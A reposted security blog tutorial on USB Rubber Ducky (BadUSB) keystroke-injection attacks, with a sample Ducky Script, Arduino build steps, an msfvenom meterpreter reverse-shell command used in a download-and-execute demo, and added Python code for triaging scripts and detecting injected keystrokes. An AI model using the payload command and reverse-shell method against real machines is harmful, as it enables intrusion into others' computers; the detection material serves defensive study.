


How To Register The Windows Button On Rubber Ducky

Pwn3d In Seconds — Attack of the Rubber Duck

In this blog, we'll be looking at the USB Rubber Ducky or the BadUSB. We'll start with an introduction to BadUSBs and what makes USBs "Bad", and then we'll look at creating our own BadUSB.

What is a USB Rubber Ducky (or BadUSB)?

USB Rubber Ducky (famously seen in the Mr. Robot TV series) is not a traditional USB drive. In fact, a USB Rubber Ducky (or BadUSB, in general) is a keystroke injector, which acts as an HID (Human Interface Device) when plugged into a computer, and mimics one. Originally developed by HAK5, it is a handy little tool for hackers and pentesters, allowing them to get a shell, run arbitrary code etc. on the target computer.

What makes a USB "BAD"?

Have you ever plugged in a USB mouse or a keyboard and got a prompt for allowing access? No, right. Well, this is what makes BadUSBs useful. As mentioned earlier, BadUSBs register themselves as an HID, let's say a keyboard, and then function in the exact same way as a keyboard does, the only difference being that with a keyboard you have to type in commands yourself, whereas the BadUSB runs an automation script typing in the keystrokes for you at a very high speed.

This automation script, dubbed a Ducky Script, is simply a set of commands or an instruction guide for the USB Rubber Ducky.

Ducky Scripts

A Ducky Script is an instruction guide for the BadUSB. It mimics a keyboard, typing in keystrokes to run various commands on the target computer.

Let's say, for example, we have to create a Ducky Script that opens up the command prompt and runs the ping command. On a normal keyboard, the steps would be:

  1. Press the Windows logo + r to open up the Run dialogue box
  2. Type cmd and press enter
  3. Type your command and press enter, in the case of the above example: <ping -n 2 10.10.x.10>

The Ducky Script for the above procedure would be:

          REM Ducky Script to ping a system
          REM Wait 1 second before the next command
          DELAY 1000
          REM Windows key + r opens the Run dialogue box
          GUI r
          STRING cmd
          ENTER
          REM Wait 2 seconds for the command prompt to open
          DELAY 2000
          STRING ping -n 2 10.10.10.10
          ENTER
          REM Wait 3 seconds for the ping command to complete
          DELAY 3000
          REM Exit the command prompt
          STRING exit
          ENTER
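When a suspect device or payload file turns up during an investigation, the script can be read without ever being run. The following is an added example, not code from the original post: a small Python summariser that handles only the five commands used in the script above and reports everything else as unhandled. The function name and output keys are hypothetical.

```python
KNOWN = {"REM", "DELAY", "STRING", "ENTER", "GUI"}  # only the commands used on this page
SHELL_NAMES = {"cmd", "cmd.exe", "powershell", "powershell.exe"}

def triage_ducky(script):
    """Summarise a Ducky Script without executing it (hypothetical helper)."""
    typed, pending, hotkeys, unhandled, delay_ms = [], "", [], [], 0
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        cmd, _, arg = line.partition(" ")
        if cmd not in KNOWN or (cmd == "DELAY" and not arg.strip().isdigit()):
            unhandled.append(line)       # surface anything this parser does not model
        elif cmd == "DELAY":
            delay_ms += int(arg)
        elif cmd == "STRING":
            pending += arg               # text typed into whatever window has focus
        elif cmd == "ENTER" and pending:
            typed.append(pending)        # ENTER submits the text typed so far
            pending = ""
        elif cmd == "GUI":
            hotkeys.append("GUI+" + arg)
    return {
        "typed_lines": typed,
        "hotkeys": hotkeys,
        "scripted_delay_ms": delay_ms,
        "opens_run_dialog": "GUI+r" in hotkeys,
        "launches_shell": any(t.lower() in SHELL_NAMES for t in typed),
        "unhandled": unhandled,
    }

# The ping script from this page, embedded as sample input.
PAGE_SCRIPT = """\
REM Ducky Script to ping a system
DELAY 1000
GUI r
STRING cmd
ENTER
DELAY 2000
STRING ping -n 2 10.10.10.10
ENTER
DELAY 3000
STRING exit
ENTER
"""

if __name__ == "__main__":
    for key, value in triage_ducky(PAGE_SCRIPT).items():
        print(f"{key}: {value}")
```

The `typed_lines` field is the part worth reading first: it is the exact command text that would land in the shell.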

What can be achieved using USB Rubber Ducky or BadUSB?

Anything that you can do with a command shell can be done using a BadUSB. For example, getting a reverse shell, bypassing end-point protection, downloading and installing malware from a malicious webserver, downloading a sensitive file from the target system and so on. Pre-written Ducky Script payloads are available on this link.

Creating your own USB Rubber Ducky

In order to create our own USB Rubber Ducky, we'll be using Arduino. For this, we'll be using an Arduino Leonardo (or any Arduino that supports USB read/write will work). Apart from this, we'll be needing an Arduino IDE and a tool to convert our Ducky Scripts into Arduino understandable code (or you can write your own Arduino code, it's fairly simple too).

Creating a USB Rubber Ducky from Arduino is extremely simple.

After writing your Ducky Script (or getting one of the pre-written scripts), use the Duckuino to convert the Ducky Script into Arduino understandable code.

Open up Arduino IDE and from Tools > Board > select your Arduino board.

Then from Tools > Port > select the port on which the Arduino is connected.

Open up a New Project, paste in your Arduino converted Ducky Script, then from Sketch > select Verify/Compile or press CTRL+R.

After the compilation is done, from Sketch > select Upload or press CTRL+U to upload the code to the Arduino.

The USB Rubber Ducky is ready to use. Disconnect the Arduino and connect it again to see it working.

Practical Demonstration

Lab Setup:

Target : Windows 10 (AV enabled for the first demo, to show the impact, but then disabled to show the execution of malware)

Let's watch our USB Rubber Ducky created with Arduino in action.

Demo # 1:

For the sake of demonstration, my Ducky Script will open up Notepad and type in some random text.

Demo # 2:

Now let's try and get a reverse shell of the target machine.

Modifying our Ducky Script so that it downloads our malware onto the target machine, and executes it giving us a reverse shell of the target.

The malware was created using msfvenom, with the following command:

          $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -f exe > game.exe        

A webserver is running on port 80, so that our BadUSB may easily download the malware.

Detection

While detection and mitigation against HID attacks is extremely difficult, a couple of tools listed below can be used to monitor USB event logs and keystrokes, and you can look for events showing that a keyboard was plugged in and within seconds a PowerShell command was executed (or the command prompt was accessed). But again, it all comes down to this: "Don't plug in a random, strange USB into your computer/network."

  • Using a tool like DuckHunter, that catches Rubber Duck attacks by looking for keystrokes that are typed at very fast speeds.
  • Using a tool like usbrip, that can display all USB log events (only for Linux systems)
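Both heuristics described in this section can be sketched over normalised telemetry. The following is an added example, not code from DuckHunter, usbrip or the original post: one function pairs a new keyboard with a shell started shortly after, the other flags keystroke runs too fast for a human. The event kinds, the 10 second window, the 30 ms gap and the 8-key run length are assumptions to tune per environment, and the sample data is constructed.

```python
from dataclasses import dataclass

SHELLS = {"cmd.exe", "powershell.exe"}  # shells named in the text above

@dataclass
class Event:
    ts: float    # seconds since capture start
    kind: str    # "kbd_attach" or "proc_start" (hypothetical normalised kinds)
    detail: str  # device description or process image name

def shell_after_keyboard(events, window=10.0):
    """Pairs (attach, proc) where a shell starts within `window` s of a new keyboard."""
    hits, attaches = [], []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "kbd_attach":
            attaches.append(ev)
        elif ev.kind == "proc_start" and ev.detail.lower() in SHELLS:
            hits += [(a, ev) for a in attaches if ev.ts - a.ts <= window]
    return hits

def injected_bursts(key_times, max_gap=0.03, min_run=8):
    """Runs of >= min_run keystrokes whose gaps are all <= max_gap seconds."""
    bursts, run = [], list(key_times[:1])
    for prev, cur in zip(key_times, key_times[1:]):
        if cur - prev <= max_gap:
            run.append(cur)
            continue
        if len(run) >= min_run:
            bursts.append((run[0], run[-1], len(run)))
        run = [cur]
    if len(run) >= min_run:
        bursts.append((run[0], run[-1], len(run)))
    return bursts

# Constructed sample telemetry, not taken from a real host.
SAMPLE_EVENTS = [
    Event(50.0, "proc_start", "cmd.exe"),          # user's own shell, no new keyboard
    Event(100.0, "kbd_attach", "HID keyboard (constructed)"),
    Event(101.0, "proc_start", "notepad.exe"),
    Event(103.2, "proc_start", "cmd.exe"),         # 3.2 s after attach: flagged
    Event(400.0, "proc_start", "powershell.exe"),  # outside the window
]
# Human-paced keys, then 20 keys 5 ms apart, then human-paced again.
SAMPLE_KEYS = [0.0, 0.21, 0.38, 0.61, 0.80] + [5.0 + 0.005 * i for i in range(20)] + [6.0, 6.2]

if __name__ == "__main__":
    for attach, proc in shell_after_keyboard(SAMPLE_EVENTS):
        print(f"{proc.detail} started {proc.ts - attach.ts:.1f}s after {attach.detail}")
    print(injected_bursts(SAMPLE_KEYS))
```

A script that adds long DELAY lines between keystrokes and commands would slip past both thresholds, which is why the section's advice about unknown USB devices still applies.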

References

  • https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
  • https://dukweeno.github.io/Duckuino/
  • https://www.arduino.cc/en/software/
  • Buy the Original USB Rubber Ducky from the HAK5 Shop


Source: https://systemweakness.com/pwn3d-in-seconds-attack-of-the-rubber-duck-26f9ae1d08b0

Posted by: sullivanyessund82.blogspot.com
